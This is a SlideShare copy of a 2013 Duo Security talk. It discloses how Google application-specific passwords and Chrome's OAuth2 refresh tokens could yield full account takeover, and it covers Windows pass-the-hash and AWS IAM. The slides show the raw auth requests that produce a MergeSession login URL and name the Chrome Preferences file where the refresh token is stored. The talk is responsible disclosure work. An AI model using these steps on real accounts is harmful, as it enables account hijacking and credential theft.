SlideShare a Scribd company logo

Security exploits of Google application specific passwords & Chrome’s OAuth2 tokens

Duo Security
Duo Security

Duo Security's investigation into the security vulnerabilities of Google Application-Specific Passwords.Plus a follow-up investigation on a few loose-ends from our previous work, which uncovered a new method of exploiting Google Chrome's OAuth2 tokens.

TechnologyNews & Politics
1 of 56
Download to read offline
Bypassing Strong Authentication... With Passwords?! Adam Goodman akgood@duosecurity.com Passwords13 - 2013-07-31 duosecurity.com 1
0. Kill The Password? duosecurity.com 2
duosecurity.com 3
duosecurity.com 4
duosecurity.com 5
1. Bypassing Google’s 2-Factor Authentication duosecurity.com 6
duosecurity.com 7
duosecurity.com 8
Google’s 2-Step Verification duosecurity.com 9
Google’s 2-Step Verification duosecurity.com 10
What About Non-Web-Based Logins? Thick-Client Protocols ‣ IMAP ‣ CalDAV ‣ XMPP ‣ ... Google Software (Interim Solution) ‣ Android ‣ Chrome duosecurity.com 11
Application-Specific Passwords duosecurity.com 12
Application-Specific Passwords ‣ 16 lowercase letters ‣ Randomly-Generated by Google ‣ Individually Revokable ‣ Not intended to be memorized sounds a bit like... duosecurity.com 13
ASPs vs. OAuth Tokens ‣ ASPs have to be generated manually ‣ ASPs aren’t actually Application-Specific! duosecurity.com 14
Not-So-Application-Specific “Another weakness of ASP is the misimpression that is provides application-limited rather than full-scope account access.” - Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1 duosecurity.com 15
Detour: Android Auto-Login Also: ‣ Chromebooks ‣ Desktop versions of Chrome (if enabled in chrome://flags) ‣ ...? duosecurity.com 16
Detour: Android Auto-Login Worked even for the most sensitive parts of https://accounts.google.com: ‣ 2FA settings: https://accounts.google.com/b/0/SmsAuthConfig?hl=en ‣ Account-Recovery Settings: https://accounts.google.com/b/0/ UpdateAccountRecoveryOptions?hl=en&service=oz duosecurity.com 17
So... ‣ ASPs can link an Android device, and ‣ With auto-login, Android devices could - with no additional authentication - take over your account completely! duosecurity.com 18
Let’s Figure Out How This Works... Android HTTPS Interception, v1 ‣ Real Device (Google Nexus S) with a custom default gateway ‣ Linux Desktop, running sslsniff ‣ http://www.thoughtcrime.org/software/sslsniff/ ‣ Custom CA certificate duosecurity.com 19
Let’s Figure Out How This Works... Android HTTPS Interception, v2 ‣ Android Emulator ‣ $ emulator -http-proxy localhost:8080 @avd_name ‣ Burp Suite Proxy ‣ http://portswigger.net/burp/ ‣ Custom CA certificate duosecurity.com 20
duosecurity.com 21
Basic Workflow ‣ POST to https://android.clients.google.com/auth ‣ Send Email, EncryptedPasswd, service=ac2dm ‣ Receive “Token” ‣ POST to https://android.clients.google.com/auth ‣ Send Email, Token, service=urlquote(“weblogin:continue=https://accounts.google.com/ ManageAccount”) ‣ Receive “MergeSession” URL ‣ Open the MergeSession URL; get instantly logged into your account! duosecurity.com 22
Step 1 POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=akgood %40arbsec.org&has_permission=1&add_account=1&EncryptedPa sswd=AFcb4...&service=ac2dm&source=android&androidId=328 1f33679ccc6c6&device_country=us&operatorCountry=us&lang=e n&sdk_version=17 duosecurity.com 23
Step 1 HTTP/1.1 200 OK ... SID=DQAAANwAAAVMG4uYt2HaF... Auth=DQAAAOAAAACRbLC5-dgM... services=goanna_mobile,apps,... Email=akgood@arbsec.org Token=1/fXrv8D3fLP1mOBj3o1... GooglePlusUpgrade=1 firstName=Adam lastName=Goodman duosecurity.com 24
Step 1: EncryptedPasswd? POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=akgood %40arbsec.org&has_permission=1&add_account=1&Passwd=xxx xxxxxxxxxxxxx&service=ac2dm&source=android&androidId=328 1f33679ccc6c6&device_country=us&operatorCountry=us&lang=e n&sdk_version=17 duosecurity.com 25
Step 2 POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=akgood %arbsec.org&has_permission=1&Token=1%2FfXrv8D3fLP1mOBj3o1... ...&service=weblogin%3Acontinue%3Dhttps%253A%252F %252Faccounts.google.com %252FManageAccount&source=android&androidId=3281f33679ccc6c 6&app=com.android.browser&client_sig=61ed377e85d386a8dfee6b86 4bd85b0bfaa5af81&device_country=us&operatorCountry=us&lang=en& sdk_version=17 duosecurity.com 26
Step 2 HTTP/1.1 200 OK ... Auth=https://accounts.google.com/MergeSession?args=continue %3Dhttps%253A%252F%252Faccounts.google.com %252FManageAccount&uberauth=AP...&source=AndroidWebLogin Expiry=0 duosecurity.com 27
Simplified Workflow ‣ POST to https://android.clients.google.com/auth ‣ Send Email, Passwd, service=urlquote(“weblogin:continue=https://accounts.google.com/ ManageAccount”) ‣ Receive “MergeSession” URL Go from Application-Specific Password to full account takeover with one API call! duosecurity.com 28
Timeline ‣ 2012/07/16: Duo researchers confirm presence of ASP weakness. ‣ 2012/07/18: Issue reported to security@google.com. ‣ 2012/07/20: Communication with Google Security Team clarifying the issue. ‣ 2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team. ‣ 2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces. ‣ 2013/02/25: Public disclosure by Duo. duosecurity.com 29
Google’s Fix ‣ Sensitive account-settings pages are no longer accessible via auto-login (you must enter username/password/OTP) ‣ ~Nothing else has changed duosecurity.com 30
Multiple Discovery ‣ http://grkvlt.blogspot.co.uk/2012/08/google-tfa-security- issue.html ‣ http://connect.ncircle.com/ncircle/attachments/ncircle/ VERTBlog/173/1/CraigYoung_BSidesSlides-2SV.pdf duosecurity.com 31
Evaluation duosecurity.com 32
2-step Verification Still Helps... ‣ Phishing ‣ Password-sharing between services (with insecure password databases) duosecurity.com 33
... But ASPs Can Be Stolen HTTPS Man-In-The-Middle ‣ Thick-client applications are notoriously bad at checking SSL certificates: https://crypto.stanford.edu/ ~dabo/pubs/abstracts/ssl- client-bugs.html Malware can grab stored passwords... ‣ Windows: Data Protection API ‣ Encrypts data using a key derived from the user’s logon credential ‣ Any process running under the same user account can decrypt any DPAPI-protected data ‣ OS X: Keychain ‣ Stronger: per-application permissions Plaintext... duosecurity.com 34
Case Study: Pidgin ‣ Plain-Text Passwords! ‣ https://developer.pidgin.im/wiki/PlainTextPasswords ‣ GTalk / “Hangouts” - (probably) low impact if compromised ‣ If we were storing a credential that only had access to your GTalk account, then storing it in plaintext might be ~OK ‣ GMail - (probably) high impact if compromised ‣ ... all of your other accounts on the internet?! duosecurity.com 35
Not Just Application-Specific Passwords ‣ Chrome on Windows / Mac / Linux has the same “auto- login” functionality ‣ ... but it’s using OAuth2 now! duosecurity.com 36
Workflow ‣ POST to https://accounts.google.com/o/oauth2/token ‣ send refresh_token, client_id, client_secret (the latter two are hardcoded into Chrome) ‣ receive access_token ‣ GET to https://accounts.google.com/OAuthLogin? source=ChromiumBrowser&issueuberauth=1 ‣ send access_token in Authorization header ‣ get “uberauth” token back ‣ Use “uberauth” token to construct a MergeSession URL duosecurity.com 37
How Is The Refresh Token Stored? from (e.g.) ~/Library/Application Support/Google/Chrome/ Default/Preferences: ... "oauth2LoginRefreshToken": { "status": "Successful", "value": "1/0209_TGZzDyfxwozFV..." } ... duosecurity.com 38
OAuth2 Won’t (automagically) Save You Unexpected threat models: ‣ Access to your tabs/bookmarks/history/etc. vs access to your entire Google account! duosecurity.com 39
2. Passing The Hash In Windows Networks... Even When Passwords Are “Disabled” (borrowing in part from http://www.foofus.net/~hinge/presos/insidious-implicit-windows-trust-relationships.pdf) duosecurity.com 40
Local vs Domain Logins ‣ Local ‣ Password hashes are stored on your workstation ‣ Domain ‣ Password hashes stored on the Domain Controller ‣ Your workstation will cache them, sometimes ‣ Both Local and Domain accounts can be administrators on your workstation Workstation Workstation Workstation Other ServerDomain Controller duosecurity.com 41
Authentication In Windows Networks ‣ NTLM Authentication ‣ Kerberos ‣ ... duosecurity.com 42
NTLM Authentication ‣ Challenge-Handshake Protocol ‣ Uses NTLM Hash of user’s password, not the password itself! ‣ One-way hash function ‣ No salting, no PBKDF2 ... ‣ Extremely pervasive in Windows ecosystems ‣ RPCs ‣ SMB mounts ‣ ... duosecurity.com 43
Pass-The-Hash NTLM Authentication only requires the NTLM Hash! ‣ Gain local admin rights on a single workstation (somehow...) ‣ Extract NTLM Hashes ‣ Use them to compromise other machines in the network! Workstation Workstation Domain Controller Workstation Other Server duosecurity.com 44
What About Smart-Cards? Public/Private Key-pair and Certificate stored on cryptographic hardware ‣ Private Key can “never” be extracted ‣ Authenticate by asking the smartcard to digitally-sign a value (basically, Challenge-Handshake) ‣ Windows can do Certificate-based user authentication Sounds much better, right? duosecurity.com 45
What About Smart-Cards? “In order to support NTLM authentication [MS-NLMP] for applications connecting to network services that do not support Kerberos authentication, when PKCA is used, the KDC returns the user's NTLM one-way function (OWF) in the privilege attribute certificate (PAC) PAC_CREDENTIAL_INFO buffer ([MS-PAC] section 2.6.1).” - [MS-PKCA]: Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos Protocol http://msdn.microsoft.com/en-us/library/cc238455.aspx duosecurity.com 46
Evaluation Smart-cards still can help... ‣ Weak Passwords ‣ Shared Passwords between accounts / systems But Pass-The-Hash attacks can still be a threat! duosecurity.com 47
3. Some Conclusions duosecurity.com 48
Real-world ecosystems tend to have multiple, distinct authentication scenarios... ... passwords (or similar stored-secret authentication methods) are likely to continue to exist in some scenarios ... ...in each scenario, we must carefully balance privileges with trust duosecurity.com 49
Authentication Scenarios and Trust Rights ‣ What is the maximum set of permissions that should be granted to a user? Integrity Level ‣ How strongly has a user / client authenticated? duosecurity.com 50
4. Amazon Web Services: Identity and Access Management (IAM) duosecurity.com 51
Identity And Access Management (IAM) ‣ A single AWS account can have multiple users ‣ Flexible Rights-Expression Language, based on: ‣ Resources (e.g. EC2 Instances, DNS zones, ...) ‣ Actions (e.g. start instance, stop instance, ...) ‣ Other session context (e.g. client IP address, SSL usage, whether 2FA was used, ...) duosecurity.com 52
IAM Policy Example { "Version":"2012-10-17", Statement: [{ "Action":["ec2:StopInstances","ec2:TerminateInstances"], "Effect":"Deny", "Resource":["*"], "Condition":{ "Null":{"aws:MultiFactorAuthAge":"true"} } }] } Deny specific actions if a user didn’t use 2-factor authentication duosecurity.com 53
2-Factor Authentication for API Clients Amazon Secure Token Service ‣ Provide API credentials and a one-time-passcode to a specific endpoint ‣ Get a new set of temporary credentials back duosecurity.com 54
Evaluation AWS gives you all the tools to build strong, flexible authorization policies... ... but you have to actually build them! AWS is intended for developers (and other savvy types) duosecurity.com 55
Questions? duosecurity.com 56

Recommended

Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Security Fact & Fiction: Three Lessons from the Headlines
Security Fact & Fiction: Three Lessons from the HeadlinesSecurity Fact & Fiction: Three Lessons from the Headlines
Security Fact & Fiction: Three Lessons from the HeadlinesDuo Security
 
Securing Access to PeopleSoft ERP with Duo Security and GreyHeller
Securing Access to PeopleSoft ERP with Duo Security and GreyHellerSecuring Access to PeopleSoft ERP with Duo Security and GreyHeller
Securing Access to PeopleSoft ERP with Duo Security and GreyHellerDuo Security
 
How To Stop Targeted Attacks And Avoid “Expense In Depth” With Strong Authent...
How To Stop Targeted Attacks And Avoid “Expense In Depth” With Strong Authent...How To Stop Targeted Attacks And Avoid “Expense In Depth” With Strong Authent...
How To Stop Targeted Attacks And Avoid “Expense In Depth” With Strong Authent...Duo Security
 
Forrester and Duo Security Webinar - 5 Signs You're Doing Authentication Wrong
Forrester and Duo Security Webinar - 5 Signs You're Doing Authentication WrongForrester and Duo Security Webinar - 5 Signs You're Doing Authentication Wrong
Forrester and Duo Security Webinar - 5 Signs You're Doing Authentication WrongDuo Security
 
A Place to Hang Our Hats: Security Community and Culture by Domenic Rizzolo
A Place to Hang Our Hats: Security Community and Culture by Domenic RizzoloA Place to Hang Our Hats: Security Community and Culture by Domenic Rizzolo
A Place to Hang Our Hats: Security Community and Culture by Domenic RizzoloDuo Security
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Duo Security
 
Security For The People: End-User Authentication Security on the Internet by ...
Security For The People: End-User Authentication Security on the Internet by ...Security For The People: End-User Authentication Security on the Internet by ...
Security For The People: End-User Authentication Security on the Internet by ...Duo Security
 

Recommended

Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Security Fact & Fiction: Three Lessons from the Headlines
Security Fact & Fiction: Three Lessons from the HeadlinesSecurity Fact & Fiction: Three Lessons from the Headlines
Security Fact & Fiction: Three Lessons from the HeadlinesDuo Security
 
Securing Access to PeopleSoft ERP with Duo Security and GreyHeller
Securing Access to PeopleSoft ERP with Duo Security and GreyHellerSecuring Access to PeopleSoft ERP with Duo Security and GreyHeller
Securing Access to PeopleSoft ERP with Duo Security and GreyHellerDuo Security
 
How To Stop Targeted Attacks And Avoid “Expense In Depth” With Strong Authent...
How To Stop Targeted Attacks And Avoid “Expense In Depth” With Strong Authent...How To Stop Targeted Attacks And Avoid “Expense In Depth” With Strong Authent...
How To Stop Targeted Attacks And Avoid “Expense In Depth” With Strong Authent...Duo Security
 
Forrester and Duo Security Webinar - 5 Signs You're Doing Authentication Wrong
Forrester and Duo Security Webinar - 5 Signs You're Doing Authentication WrongForrester and Duo Security Webinar - 5 Signs You're Doing Authentication Wrong
Forrester and Duo Security Webinar - 5 Signs You're Doing Authentication WrongDuo Security
 
A Place to Hang Our Hats: Security Community and Culture by Domenic Rizzolo
A Place to Hang Our Hats: Security Community and Culture by Domenic RizzoloA Place to Hang Our Hats: Security Community and Culture by Domenic Rizzolo
A Place to Hang Our Hats: Security Community and Culture by Domenic RizzoloDuo Security
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Duo Security
 
Security For The People: End-User Authentication Security on the Internet by ...
Security For The People: End-User Authentication Security on the Internet by ...Security For The People: End-User Authentication Security on the Internet by ...
Security For The People: End-User Authentication Security on the Internet by ...Duo Security
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by HubspotMarius Sescu
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTExpeed Software
 

More Related Content

Recently uploaded

WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Recently uploaded (20)

WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

Featured

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by HubspotMarius Sescu
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTExpeed Software
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsPixeldarts
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthThinkNow
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfmarketingartwork
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024Neil Kimberley
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)contently
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024Albert Qian
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
